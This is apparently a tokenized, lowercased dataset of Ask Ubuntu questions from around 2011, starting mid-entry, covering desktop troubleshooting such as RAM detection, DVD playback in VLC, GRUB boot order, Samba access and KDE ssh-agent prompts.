248 kb swaptotal : 2076668 kb swapfree : 2075652 kb dirty : 4 kb writeback : 44 kb anonpages : 869668 kb mapped : 195364 kb shmem : 9360 kb slab : 88080 kb sreclaimable : 61084 kb sunreclaim : 26996 kb kernelstack : 3712 kb pagetables : 36956 kb nfs_unstable : 0 kb bounce : 0 kb writebacktmp : 0 kb commitlimit : 3750104 kb committed_as : 3551040 kb vmalloctotal : 34359738367 kb vmallocused : 195492 kb vmallocchunk : 34359536360 kb hardwarecorrupted : 0 kb anonhugepages : 0 kb hugepages_total : 0 hugepages_free : 0 hugepages_rsvd : 0 hugepages_surp : 0 hugepagesize : 2048 kb directmap4k : 189440 kb directmap2m : 3217408 kb output of sudo dmidecode - http : //pastebin.com/85vbdymc trying with a bootable usb of 11.04 & 11.10 and booting from it , shows 3.2gb only as usable . as per chat with fossfreedom , i tried removing the 1gb sticks and just keep the new 2gb sticks in it and booted from it . the system still showed 3.2gb of ram . i even moved them to a single channel and still it showed 3.2gb of ram . and if it helps , 1gb sticks are from the same manufacturer - corsair ( infact a dual channel memory kit ) and the newer 2gb sticks are from the same manufacturer - kingston . i was also adviced to upgrade bios but since it detects full 6gb of ram , i doubt it has anything to do with that . bios release notes do n't mention anything that fixes the problem . here is the pdf - http : //downloadmirror.intel.com/17520/eng/mq_1761_releasenotes.pdf ( my bios version - 1687 ) the only options i see in bios is of changing the frequency on which the ram is running and the latency . screenshot follows : any idea what 's going on here ?
82918	how do i get liferea 1.8 rc to use the global application menu ?	i just updated liferea from 1.6 to 1.8 rc thru ppa . after the update liferea disappeared from unitys global message indicator in the top menu . also there is no standalone icon in unity . in gnome classic liferea 1.8 rc shows an icon in the top menu . i have the status `` icon in notifier '' option activated in the settings . does anyone know if it is possible to get liferea to show up again in unity .
82923	`` vlc could not read the file '' error when trying to play dvds	i can watch most dvd 's on my machine using vlc but today , i went to watch thor , and it wo n't play . libdvdread4 and libdvdcss2 are at the latest versions . vlc -v returns 1.1.4 w32codecs are installed and reinstalled ubuntu-restricted-extras are same as above my machine recognises the disc and i can open the folder and browse the assorted .vob files , of which there are many . none of them will open in vlc , or in mplayer etc . when i run vlc -vvv /media/thor/video_ts/vts_03_1.vob i get : file reading failed vlc could not read the file i also see command line output like this : [ 0x963f47c ] main filter debug : removing module `` swscale '' [ 0x963a4b4 ] main generic debug : a filter to adapt decoder to display is needed [ 0x964be84 ] main filter debug : looking for video filter2 module : 18 candidates [ 0x964be84 ] swscale filter debug : 720x576 chroma : i420 - > 979x551 chroma : rv32 with scaling using bicubic ( good quality ) [ 0x964be84 ] main filter debug : using video filter2 module `` swscale '' ... .. [ 0x959f4e4 ] main video output warning : late picture skipped ( -10038 > -15327 ) [ 0x963a4b4 ] main generic debug : auto hidding mouse [ 0x93ca094 ] main input warning : clock gap , unexpected stream discontinuity [ 0x93ca094 ] main input warning : feeding synchro with a new reference point trying to recover from clock gap [ 0x959f4e4 ] main video output warning : early picture skipped ... ... ac-tex damaged at 0 12 ac-tex damaged at 6 20 ac-tex damaged at 12 28 this happens with onboard and known good usb dvd player i do n't have standalone dvd player to try with tv i am going to watch another film instead for now , because i can do that . i just ca n't watch thor , and i 'm pretty confident that the disc is ok . it is a rental , but it 's clean and there are no surface abrasions . i even cleaned it with christian dior aftershave to make sure .
82924	how i type @ with a latin american keyboard ?	i used to press ctrl + alt + q in windows . i think i tried every combination in ubuntu and @ does n't appear .
82928	how to make windows boot first ?	i want to know how to make windows the default boot os in ubuntu 11.10 , how to make windows boot first on grub2 , specifically for windows 7 , which is my current version . i know that are some tutorials about this , but it seems that i made a mistake , so i 'm asking . luckily nothing serious happened . i did n't lose my data . the difference between my question and the tutorials is that the tutorials are from older version . sorry for any disturbs and redundancy of the question . i 'll love it better for a gui app that making easy the boot . p.s : i forgot to say the version of my os 's i am running windows 7 home premium x64 bit ubuntu 11.10 x64 bit i hope this will make understand better because i now saw it a tutorial that for 64 bit versions startup-manager does n't work .
82931	configuring bind9 views so i can have dns services ?	i want to configure bind9 using the ubuntu terminal to have the dns resolve a local name , not a domain name . for example , if i type in nicole it will resolve my ip address in a local network fashion . how can i do this , step-by-step please ? i 've already installed bind9 using : sudo apt-get install bind9 it 's fully installed now , i just need some help configuring . should i be using local views ? i am going to do the connection with two laptops probably connected to each other by ethernet cable or wifi . one of them is running ubuntu and the other is running windows . i not sure if that 's part of the problem .
82940	where 's xorg.conf ?	i 'm trying to force 1600x900 on my old hp dc5000 with an integrated intel 82865g gpu running ubuntu 11.10 oneiric ocelot . mikewhatever suggested to edit the xorg.conf : .xprofile is n't enough so , i search /etc/x11/ but it 's not there . am i supposed to create a new file , or it 's located somewhere else ? i tried reverting back the driver to 2.4 but i ca n't get the authorization key for jaunty . the driver works perfectly on 10.04 and 10.10 . i just wan na play with compiz !
82949	netbeans 7.0.1 installed but wo n't run	i installed netbeans 7.0.1 , and i 've made sure to install all the jdks and jres i could find . it installed without errors . i also saw this question and made sure i followed all the instructions there as well . i never got any error messages of any kind . so far as i know , it installed okay . however , when i try to run netbeans , i get no response . if i run it from the command line , after about 30 seconds , the prompt just comes back . there 's no error message of any kind to let me know what 's wrong . $ /bin/sh `` /home/dave/netbeans-7.0.1/bin/netbeans '' $ what 's the issue , and how do i get netbeans to run ? new command line output as a result of following instructions offered in an answer : $ sudo update-alternatives -- config java there are 2 choices for the alternative java ( providing /usr/bin/java ) . selection path priority status -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- * 0 /usr/lib/jvm/java-6-openjdk/jre/bin/java 1061 auto mode 1 /usr/lib/jvm/java-6-openjdk/jre/bin/java 1061 manual mode 2 /usr/lib/jvm/java-6-sun/jre/bin/java 63 manual mode press enter to keep the current choice [ * ] , or type selection number : 2 update-alternatives : using /usr/lib/jvm/java-6-sun/jre/bin/java to provide /usr/bin/java ( java ) in manual mode . $ /bin/sh `` /home/dave/netbeans-7.0.1/bin/netbeans '' $
82952	set virtual console keymap on live ( cd|usb ) ?	how can i change the keymap of the ctrlalt+ ( f1tof6 ) virtual consoles on the liveusb/cd image ? i 've tried picking my layout ( us dvorak ) from the f3 menu when it first starts to boot , but that only sets the gui keymap and not the virtual console keymap . this is especially frustrating because of a bug in the driver for my video card ( neauvou ) that will completely freeze the system if i do too much ( seems to be related to fast cursor movement ; for example , holding down backspace or arrow key in gnome-terminal ) . this makes me want to use the virtual consoles , but then they are the wrong layout and therefore hard to type on .
82955	linux operating system for smart phones	i want to buy a new smart phone . i am thinking of buying samsung galaxy s2 and i was thinking is there a linux operating system for smart phones ? i have been using ubuntu for years and i would like to continue use ubuntu on my smart phone as well .
82964	can i open peazip files on windows operating system ?	can i open peazip files with winrar or winzip on windows operating system ? if they can not be open is there a way to create rar and zip files that can be open on linux and windows operating systems ?
82971	why can ubuntu tweak bring icons back , and gconf editor not ?	i was missing icons from menus in ubuntu 11.10 . i tried enabling them by setting menus_have_icons to true in gconf editor , as various answers on this site mention . however , that did n't work . then i tried ubuntu tweak , and it did work . what is that program doing differently ?
82976	how to get openssh to use ksshaskpass under kde ?	when using a gnome desktop on ubuntu , if i use openssh client to connect to another computer ( running from the gnome-terminal ) , i get a single graphic popup asking for my private key 's pass-phrase . after that i no longer need to enter my pass-phrase as it is cached by the ssh agent . under kde it does n't work like that - when i start ssh from konsole , i get a text prompt for my pass-phrase every single time , even though ssh-agent is running . if i run ssh-add from the terminal then i can enter my pass-phrase on the terminal and it will be stored by ssh-agent and i wo n't get any more pass-phrase prompts , while if i run ssh-add the krunner graphical command line ( `` run '' dialog ) then i get a graphical prompt with the same behavior . the problem is i have to remember running ssh-add every time i log in to the desktop . how can i get ssh to behave under kde , the same as it does on gnome - the first time the pass-phrase is needed , pop up a graphical dialog and store the pass-phrase in the agent . i 've installed ksshaskpass , but that did n't change anything .
82977	grub update making automated install stuck	i am following these instructions- https : //help.ubuntu.com/community/automaticsecurityupdates on ubuntu 10.04 lts server 64 bit . the problem is that when the update script is executed , it gets stuck because grub is asking a question `` you chose not to install grub to any devices . if you continue , the boot loader may not be properly configured , and when this computer next starts up it will use whatever was previously in the boot sector '' how do i make automated install work ? is there a way to blacklist a particular update to a package .
82978	how can i run ubuntu one on xubuntu ?	i installed ubuntu one on my xubuntu oneiric , but when starting the program nothing happens . i do not see the control center . any ideas ?
82979	how come when i 'browse network ' in nautilus it says windows network ?	this is a samba thing , yes ? what file can i edit to change that name ?
82982	how can i install the global menu package for firefox beta if i 'm also using firefox stable ?	i 'm currently running the firefox beta channel . i installed it manually , and not through a ppa ( so that i can also have firefox stable ) . however , the firefox-globalmenu package is only compatible with firefox stable . how can i get firefox beta to use a global menu ?
82984	why does scp get stalled ? how do i resolve it ?	when i attempted to copy a file ( of size , ) over the network using scp i get a error < file > stalled why does this happen ? how do i resolve it ?
82989	dbus/obex error with bluetooth	i paired my pc and mobile phone ( se c702 ) . then i try to browse files on it . but i get this error when i try to choose c702 on nautilus : could not display `` obex : // [ 00:24 : ef:17 : bb:45 ] / '' error : dbus error org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) please select another viewer and try again . i tried find over the internet and found some ways to fix it : use blueman ( it does n't help me ) remove gnome-vfs-obexftp ( but it 's not installed ) what else can i do ? os is ubuntu 11.10 desktop manager is unity
82993	running an application on or under ubuntu ?	what is the right expression ? example 1 : this shows thunderbird on ubuntu . this shows thunderbird under ubuntu . example 2 : i run octave on ubuntu . i run octave under ubuntu . is there a difference ? why ? and if there is difference : what is it ? thanks !
82995	how to move all installed programs from my computer to another computer or laptop ?	if i have installed a lot of programs/games on my computer ( desktop ) and now buy a new laptop and i have installed a ubuntu 11.10 on it too then , how to move all installed programs on my desktop to my laptop instead of installing them again on my laptop ? ? ?
82996	how can i solve the problem of installing gnome shell extensions ?	i wanted to install the extensions of gnome shell , ( for exemple gnome-shell-extensions-apps-menu ) , but i have this error : mbb @ mbubuntu : ~ $ sudo apt-get install gnome-shell-extensions-apps-menu lecture des listes de paquets ... fait construction de l'arbre des dépendances lecture des informations d'état ... fait certains paquets ne peuvent être installés . ceci peut signifier que vous avez demandé l'impossible , ou bien , si vous utilisez la distribution unstable , que certains paquets n'ont pas encore été créés ou ne sont pas sortis d'incoming . l'information suivante devrait vous aider à résoudre la situation : les paquets suivants contiennent des dépendances non satisfaites : gnome-shell-extensions-apps-menu : dépend : gnome-shell-extensions-common mais ne sera pas installé e : impossible de corriger les problèmes , des paquets défectueux sont en mode « garder en l'état » . and when i show the log error of this extension using ( alt+f2+lg+extensions_section ) i have this error : extension is not compatible with current gnome shell and/or gjs version .
82997	ca n't make the multimedia keys work in lxde	i 've tried to edit the configuration file in ~/.config/openbox/lxde-rc.xml however the changes do n't take effect , i still ca n't use the keys . the lxde wiki shows that after finding that my keyboard sends the correct standardized keyboard events i should go and edit the file to my liking , the keyboard does send the correct events and the keys are properly identified yet nothing happens . since lxde does n't come with a sound preferences option i have installed xfce4-mixer . i too have a netbook running lubuntu and its media keys are working fine , i do n't know if what i installed has had something to do here ? . i also installed xfce4-volumed volume keys daemon from synaptic but to no avail , still nothing . how can i make the multimedia keys of my keyboard ( microsoft wireless keyboard 1000 ) work in lxde with xfce4-mixer edit : here is my lxde-rc.xml file i 've commented the line onlyshowin=xfce : in /etc/xdg/autostart/xfce4-volumed.desktop and now i get a notification when pressing the volume keys however it does n't have any effect on the audio output . the play/pause , stop , etc . keys still do n't work . i also tried to use the commands my xml file has , i.e . amixer sset master 3 % + and i get this : simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined penum playback channels : mono limits : playback 0 - 64 mono : playback 5 [ 8 % ] [ -59.00db ] [ on ] using the command again raises this value mono : playback 5 [ 8 % ] [ -59.00db ] [ on ] to mono : playback 7 [ 11 % ] [ -57.00db ] [ on ] but no audible effect is noticed .
82998	can see samba shares but not access them	for the life of me i can not figure this one out . i have samba installed and set up on the ubuntu box and on the win7 box i can see all the shares i created . i created two users on ubuntu that map to the users in windows . on ubuntu they are both admins , user a & b on windows user a is admin and user b is poweruser . user a can see both shares and access them , but user b can see everythin , but only access the homes directory , the other directory throws an error . i have two drives in ubuntu and this is the smb.config file ( i am new to samba ) : [ global ] workgroup = workgroup server string = % h server ( samba , ubuntu ) wins support = no dns proxy = yes name resolve order = lmhosts host wins bcast log file = /var/log/samba/log. % m max log size = 1000 syslog = 0 panic action = /usr/share/samba/panic-action % d security = user encrypt passwords = true passdb backend = tdbsam obey pam restrictions = yes unix password sync = yes passwd program = /usr/bin/passwd % u passwd chat = *enter\snew\s*\spassword : * % n\n *retype\snew\s*\spassword : * % n\n *password\supdated\ssuccessfully* . pam password change = yes map to guest = bad user ; usershare max shares = 100 usershare allow guests = yes and here is the share section : both user a & b can access this from windows . no problems . [ homes ] comment = home directories browseable = no writable = yes both user a & b can see this share , but only user a can access it . user b get an error thrown . [ stuff ] comment = unixmen file server path = /media/data/appinstall/ browseable = yes ; writable = no read only = yes hosts allow = the permission for the media/data/appinstall/ is as follows : appinstall properties : share name : stuff allow others to create and delete files in this folder is cheeked guest access ( for people without a user account ) is checked permissions : owner : user a folder access : create and delete files file access : -- - group : user a folder access : create and delete files file access : -- - others folder access : create and delete files file access : -- - i am at a loss and need to get this work . any ideas ? the goal is to have a setup like this . 3 users on window machines . each user on the data drive will have their own personal folder where they are the ones that can only access , then another folder where 2 of the users will have read only and one user full access . i had this setup before on windows , but after what happened i am never going back to windows , so unix here i am to stay ! i am really stuck . i am running ubuntu 11 . i could reformat again and put on version 10 if that would make life easier . i have been dealing with this since wed. 3pm . thanks .
82999	display brightness and resolution issues with an nvidia gt520m	i have a notebook with nvidia gt520m ( which uses optimus technology ) and after a long and bloody fight i finally put it to work through ironhide . last night i let my notebook be out of battery by accident . after reboot and login , the default screen changed from 1366x768 to 1024x768 and the screen brightness init with 0 ( screen totally black , brightness adjusted by the keyboard controls ) . note that the login screen is ok , perfect resolution and brightness ... how can i change back this values ? and what happened : -t ? thank you all ! ! notes : i ca n't access nvidia settings , always crash ironhide . when i change the resolution by xrandr or `` screen '' interface it 'll ok , but i always lost the configuration after reboot . after i install ironhide for the first time , i reboot the system several times , and it was ok .
83001	ca n't remove couchdb	under 11.04 , when i do sudo couchdb -v , i get a response like `` couchdb - apache couchdb 1.1.1 '' . when i do couchdb -v , without sudo , i get that no package/program like that is installed . i 've tried doing sudo apt-get remove couchdb and purge too , but i ca n't make couchdb disappear . when doing a dpkg -l | grep couchdb , i get : rc couchdb 1.0.1-0ubuntu15 restful document oriented database , system db rc couchdb-bin 1.0.1-0ubuntu15 restful document oriented database , programs i do n't understand what 's the actual situation , or how can i try to solve this .
83018	gateway laptop no longer recognizes wireless hardware after hard reboot	i had wireless working with no problems . laptop froze and required hard reboot . since then the laptop does not recognize internal wireless hardware . wireless network still working with other devices . laptop can access network with wired ethernet connection . i suspect a hardware failure given the sequence of events . i miss the 'administration ' menu available in previous releases that allowed me to see what hardware was installed , working or has problem . any and all suggestions appreciated . thank you in advance for you assistance .
83026	prevent gedit from creating files with the '~ ' ( tilde ) suffix	i have observed that in gedit if i edit a file , another file is created in the same directory ( the one with the same filename and a tilde '~ ' suffix ) . the extra file remains even if i close gedit . i understand the need for a temp file ( eg . in case of a crash ) , but vim for example deletes the extra file it creates , when i close it . is there a way to do the same with gedit ? some configuration perhaps ?
83035	how do i allow a user access to one specific directory and its contents ?	i am using ubuntu server 11.04 , how can i make it so a user can only access /var/www/site1 ?
83037	how do i reinstall grub2 ?	having tried all day to reinstall grub and trawling the internet i have had no luck . i can no longer boot into ubuntu and have tried boot disk frin yannubuntu but the grub tabs are greyed out . other methods will not install it on sda1 . i have no other os to boot into but have a live usb . please help
83040	i ca n't install kbibtex ( kd4 )	i have ubuntu 11.10 and am trying to install the latest version of kbibtex but i ca n't do it . anyone know how to do ? i downloaded the tar.bz2 file from kd4 page ( http : //home.gna.org/kbibtex/download.html ) , followed the instructions but i get the following error : ~/kbibtex-0.4-beta1/build $ cmake ../ -dcmake_install_prefix=home -dcmake_build_type=build_type & & make -- the c compiler identification is gnu -- the cxx compiler identification is gnu -- check for working c compiler : /usr/bin/gcc -- check for working c compiler : /usr/bin/gcc -- works -- detecting c compiler abi info -- detecting c compiler abi info - done -- check for working cxx compiler : /usr/bin/c++ -- check for working cxx compiler : /usr/bin/c++ -- works -- detecting cxx compiler abi info -- detecting cxx compiler abi info - done cmake error at /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:91 ( message ) : could not find qt4 ( missing : qt_qmake_executable qt_moc_executable qt_rcc_executable qt_uic_executable qt_include_dir qt_library_dir qt_qtcore_library ) call stack ( most recent call first ) : /usr/share/cmake-2.8/modules/findpackagehandlestandardargs.cmake:252 ( _fphsa_failure_message ) /usr/share/cmake-2.8/modules/findqt4.cmake:1162 ( find_package_handle_standard_args ) cmakelists.txt:7 ( find_package ) -- configuring incomplete , errors occurred ! someone can give me an idea of ​​what 's going on ?
83041	kubuntu 11.10 very slow during file i/o	after updating to kubuntu 11.10 , my file i/o performance has slowly just gotten worse and worse . it is to the point where i 'm getting 1 mb/s write/read speeds to the drive . if i download something , the whole machine becomes unresponsive for at times up to 30 seconds . this usually causes a timeout in the download and the download then stops . even extracting archive files , while extracting the computer is just unusable on top of the terrible read/write speeds . it is n't the drive as i have windows installed as well and when i boot to it i have no issues with the drive . i did not have this issue using kubuntu 11.04 and am thinking of downgrading . however , i 'd much rather help out the ubuntu community by working through these issues . i 'm starting to lean towards the new linux kernel is just not working well with file handles . during file i/o my system usage does pick up , but it is not 100 % cpu usage . my system is as follows . samsung 2 tb hard disk drive amd phenom ii x6 1055 4 gb ram ( only one in use according to system monitor ) ati 5850 hd
83051	how can i manage keyboard shortcuts ?	in 10.04 , i 've had a keyboard shortcut defined via it 's keyboard settings applet . recently i have upgraded to 11.10 ( i use gnome-classic ) . this shortcut still works , but i ca n't find it in system setting 's keyboard applet . this means i do n't know how to disable it . not that it bothers me too much ( now , at least ) , but not being able to control my own computer does n't seem very pleasant . where does ubuntu store my keyboard shortcuts ? btw , i do not use compiz , and i ca n't find my shortcut in gconf either . update sory , i have just remembered , that shortcut was defined using xbindkey , so it has nothing to do with gnome/unity/whatever . thanks for your attempts to help me and sorry for your wasted time . the question should probably be deleted .
83052	just updated , after reboot my computer wo n't start up again	i have a macbook that i use on occasion which dual boots ubuntu and osx ( it has refit installed ) . i turned it on for the first time in a while and it needed a bunch of updates . so i let it run , and restarted it when it asked . when it was booting up , it got stuck at a light blue screen . there was nothing on the screen to indicate that it was doing anything - i figured it just got stuck or something , so i turned it off and back on . ( i suspect now it was actually working , but i had no indication that it had n't just frozen ) now i ca n't access either osx or my ubuntu partition . when i choose ubuntu on the refit menu , it shows `` no bootable device -- insert book disk and press key '' . if i try to start up osx is looks like it starts loading , but instead of an apple logo there 's a crossed out circle icon . edit : a bit spooky , but the problem seems to have gone away . no idea why . i tried booting up again under osx so i could see if there was any diagnostic information i could google , but this time the desktop came up without a problem . i thought that was a bit odd , and decided to try the ubuntu partition as well , which now also works just fine . i 'm now even more suspicous of hardware problems ... luckily there 's nothing terribly important on this computer , but i 'll use it as long as it works i guess .
83053	how do i fix skype garbling audio both ways in connection with a windows user ?	strange phenomena âż i have a friend i connect with and talk to regularly occasionally using video . he runs windows xp with a logitech webcam and mike . i run windows xp with a logitech webcam and mike , and a laptop with built in webcam and mike running both 11.10 x86 desktop and windows xp home . we gab and ogle fine with these . but when i installed 11.10 x86 with gnome 3.2 dual boot on the same machine with the logitech webcam and mike , whenever i try to ogle and gab the audio is total garbled . when i make a test call to skype or call somebody on a landline or cell - there 's no problem . in summary , everything works except for when running 11.10 x86 gnome 3.2 connected to his windows xp . stumped on this end .
83055	fail to boot after installation onto asus pc 1015px	my new asus 1015px has the usual windows on the sda1 partition - 100gb , followed by sda2 - 15gb - as the recovery partition for windows , and sda3 with 183gb for drive d : \ for windows . asus uses sda4 - 19mb for it 's own use . 11.10 on an usb will load ubuntu on a try basis and it seems ok , but every time i attempt an install , ubuntu quickly shuts down and the restart process begins . this repeats endlessly . i 've tried 10.04 netbook remix but that will not boot at all with the machine reporting - unknown keyword in config file gfxboot vesamenu.c32 : not a com32r image . i 've gone through the above about 6 times each with the same results . i have also tried the above with the partitioning unchanged , and using gparted , with sda3 formatted to ext4 , windows d : \ reduced to 8gb providing a 175gb unallocated space - all to no avail . further information : during my attempt to load 11.10 , i notice that on the page which offers 3 options of loading , the first in the list includes the statement 'install inside windows ... ' whereas the on line help shows 'install alongside windows ... ' . ( my caps for emphasis ) i have double checked that i am using the correct download - not the install within windows option .
83058	kubuntu wallpaper settings disappear	to render my system useable after upgrading to 11.10 , i had to abandon gnome and install the kde window manager . this is mostly fine , but the desktop wallpaper slideshow works for a few minutes and then gets reset to the default ( fixed kubuntu splash background ) . i can start up the slideshow again by right-clicking on the background and re-entering all the desktop settings , but then it just disappears again after a while . what could be causing this ? oops ! what i failed to realize was that kde apparently uses an independent wallpaper setting for each desktop . i have 12 , so some were set to the slideshow but others were still set to the default . being accustomed to one common wallpaper setting for all desktops , i misinterpreted this as a global reset . sorry !
83059	how to import bookmarks from html in firefox ?	when i need to import the bookmarks in firefox , i usually go to bookmarks > see all and then click on the import button , but in 11.10 it is not there anymore . how can i import bookmarks from a html file ?
83061	best version for quick links : asus eee pc 1001pxd-eu17	i am a total linux novice and am wondering which version ( distro ) of ubuntu should i install on a asus eee pc 1001pxd-eu17 . it 's a netbook and i hear that windows 7 starter is a dog . any help would be greatly appreciated . processor : intel atom n455 ( 1.66ghz ) memory : 1gb ddr3 memory graphics : intel uma hdd : 250gb ( 5400rpm ) wlan : 802.11b/g/n webcam : 0.3mp bluetooth : no bluetooth battery : 23w/h ( up to 4* hrs )
83064	battery monitor only showing up on laptop when power cord is plugged in	my battery monitor is only showing up on laptop when power cord is plugged in . i have tried this answer here but no luck , it always says that the program is unable to be found ! sorry for not being specific , most of the info is on the link posted . thanks !
83086	is gstreamer the best encoder for vorbis or is there a better encoding engine i should use ?	i have sound juicer installed and i want to rip to vorbis.ogg . is gstreamer the best encoder for vorbis or is there a better encoding engine i should use . the default gstreamer profile is audio/x-raw-float , rate=44100 , channels=2 ! vorbisenc name=enc quality=0.5 ! oggmux i am going to raise the quality to 0.7 but thats all nothing if gstreamer is n't the best encoder . any suggestions for high quality ripping ? edit : a good answer to this will also be the top search result in google for `` best vorbis encoding engine '' . double edit : it appears oggenc itself is the best encoder which rules out using sound juicer to rip cd 's as it uses gstreamer . i have installed oggenc and am testing the command ripper abcde . found a good configuration for it here oggenc config for abcde
83087	change screen brightness on a desktop ?	i 'm running ubuntu 11.10 on a desktop , so i do n't have fn , and the option does n't appear in under system settings > screen as it apparently only appears if your computer is detected to be a laptop . is there any way to change screen brightness ?
83090	why the feature to insert date/time not work in gedit ?	when i tried to insert the date/time of gedit , no data was inserted into the document . only blank spaces appeared in the current cursor position . i tried again from the terminal , it was the same and no error message . any hints to identify the error or if there is something wrong in the settings ? additional information : gedit version 3.2.1-0ubuntu2 - 11.10 - 64-bit
83092	backing up to ftp server takes 8 hours	when trying to backup using deja dup to an ftp server , i find it takes about eight hours to backup what little i have in my home directory . this is a laptop , and so i have only had the time to have it make one complete backup . this worries me and i would like to have it upload faster . is there some setting i can change to make it go faster ? i 'm already running low on ubuntu one space and want cloud backup . any suggestions ?
83093	what should be content of grub2 custom entry to boot to another os on lvm over luks along with ubuntu ?	i have archlinux installed along with ubuntu on lvm over luks . the problem is i can not boot to arch from menuentry provided by os-prober . can anyone tell me the custom entry configuration to dual boot ? here is my harddrive partitions : /boot /dev/sda1 100mb [ ubuntu 's boot partition ] /dev/sda5 encypted partition with the following logical volumes : general-home [ home partition of both ] ubuntu-root [ ubuntu / partition ] general-swap [ swap partition ] arch-root [ arch / partion which contains /boot as well ] thanks for the help .
83099	how to change desktop icon size ?	this is my desktop , the icon is too big . i tried to use gsettings set org.gnome.nautilus.desktop font `` ubuntu 9 '' but the it changes only font size of the desktop icons . i tried to use compiz , advance settings and configuration editor but they just have font size option , not icon size option . how to change the desktop icon size ?
83102	3.0.0-13-lowlatency-pae , where can i find its source	i know for another post that using apt-get source linux-image- $ ( uname -r ) i can get the kernel source , but i 'm using the 3.0.0-13-lowlatency-pae kernel and using the command , i got this message : picking 'linux-lowlatency ' as source package instead of 'linux-image-3.0.0-13-lowlatency-pae' so , i will appreciate any help , hope that someone know where it can be located . thanks everybody in advance .
83106	can i change the lock screen background to be different from the desktop background ?	i want the lock screen background to be different from the desktop background in ubuntu 11.10 , how can i do that ? it 's okay when i am using 11.04 , why 11.10 ca n't ? thanks
83109	kernel mem parameter	as a last resort to my question , i am yet to try the mem parameter of kernel to force it to use the specified amount of ram . short summary - i can only see 3.2gb ram on a 64bit os and am not sure ifs a hardware limitation , so wants to try as i found a post on ubuntuforums . my question is if its ok to play with my resident ubuntu install or should i be using a live bootable usb ? what values do i try ( i have 6gb with only 3.2gb being usable ) and how to keep it safe ? i do n't want to burn any of my hardware component at this point of time or make the system unbootable . running ubuntu 11.10 with kernel 3.0.0-13-generic
83111	how to copy a directory from your home to a system wide one	i want to use the file manager to copy a directory from my desktop to the /opt directory . when i run gksudo nautilus , i do not see anything in the desktop directory . if i open nautilus normally from the taskbar , it shows the lampp directory along with other existing ones . so how do i get to view this directory so i can cut and paste it into /opt directory ?
83115	malformed 3rd word in the status line error	after installing ubuntu 10.10 i can not do the update . this is the error message i received : reading package listsâś error ! e : malformed 3rd word in the status line e : error occurred while processing lksctp-tools ( usepackage1 ) e : problem with mergelist /var/lib/dpkg/status e : the package lists or status file could not be parsed or opened . anyone , help ?
83117	skype is closed after logging in	i installed skype using ubuntu software center . when i logged in to skype , it was automatically closed . i tried to remove and reinstall it but the problem is still there . how to fix it ? update : log output after login . hieund @ hieund : /etc $ skype fatal : assert : `` interface- > childcount ( ) == children.count ( ) '' in file adaptor.cpp , line 200 aborted hieund @ hieund : /etc $
83118	create a link to a folder on the left panel of nautilus file manager ?	i would like to create a link to some new folder that i have in my home . the left panel shows docs , images downloads etc . but i would like to add my other folders that i created myself like university etc , it use to be as simple as drag and drop the folder on the panel , but it doens't work anymore . how can i create a link ? the image is to show what panel i 'm talking about :
83121	i ca n't enable extra effects in ubuntu 10.10 . please help ?	i installed ubuntu 10.10 alongside ubuntu 11.10 to use an older version of compiz . on ubuntu 11.10 , compiz was enabled by default and i did n't need to use any graphics driver to enjoy the effects . all i had to do was install compizconfig settings manager and enable those extra effects . that was compiz 0.9.6 . now , after installing ubuntu 10.10 , when i first logged in , the graphics were slow . when i dragged a window from one end of the screen to the other , the whole screen would blur up and pixelate and it would be very laggy . i tried going to system > preference > appearance and selecting extra effects on the visual effects tab , but all i got was `` desktop effects could not be enabled '' . i do n't know whether i should install the additional drivers ( proprietary ) because my internet is slow and it would take a long time . furthermore , in ubuntu 11.10 , after i installed the proprietary graphics driver , i immediately went into fallback mode and was n't even offered an option to set my desktop session to ubuntu 3d . i did n't need the driver to run compiz in ubuntu 11.10 , it just ran so smoothly . but in ubuntu 10.10 , everything is so laggy . should i install the ati/amd proprietary fglrx graphics driver for ubuntu 10.10 to enable extra effects ? or is there something else wrong with my system ? here is the output of lspci -nn | grep vga 00:02.0 vga compatible controller [ 0300 ] : intel corporation sandy bridge integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : ati technologies inc device [ 1002:6760 ] here is the output of the same command , but in ubuntu 11.10 ( in this case the one which is correct , because i do n't have the sandy bridge integrated graphics controller ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation 2nd generation core processor family integrated graphics controller [ 8086:0116 ] ( rev 09 ) 01:00.0 vga compatible controller [ 0300 ] : ati technologies inc ni seymour [ amd radeon hd 6470m ] [ 1002:6760 ]
83126	slow window moving animation with an nvidia g210m	animation of moving windows in ubuntu 11.10 ( unity ) on nvidia g210m card with nvidia-current drivers becomes very slow and laggy from times to times . 11.04 and under had no problem . 11.10 + nouveau no problem , too .
83131	how can i enable the software centre to also install recommended packages ?	how can i enable ubuntu software centre to also install recommended packages ? currently , it seems just to install the software i selected whcih sometimes does not work without recommended software .
83134	using juju returns `` ssh invalid key '' error	can someone tell me with piece of code is executed when i do : juju status . i 'm running juju on openstack and i want to deploy some services but when i do juju status it returns me an ssh invalid key error : permission denied ( publickey ) . connectionreset reading response for 'bzrdir.open_2.1 ' , retrying permission denied ( publickey ) . bzr : error : connection closed : unexpected end of message . please check connectivity and permissions , and report a bug if problems persist .
83135	can i update my kernel in 10.10 ?	i am using kernel version 2.6.35 in ubuntu 10.10 . can i update my kernel to the latest version , which is v3.2-rc3-oneiric as seen on http : //kernel.ubuntu.com/~kernel-ppa/mainline/ ?
83137	list of wireless adapters that `` just work '' with ubuntu 11.10	there are various resources out there , from the official ubuntu documentation to many forum topics and askubuntu questions , all seeking to answer the same question : which adapters work with ubuntu ? but , as is usual in such situations , much of the existing material is messy and/or outdated . i 'd like to know which ones work with ubuntu 11.10 specifically -- the latest , `` out of the box '' version , with no kernel modifications or additional drivers to manually mess with . i believe that this will be a very useful resource when deciding to buy an adapter .
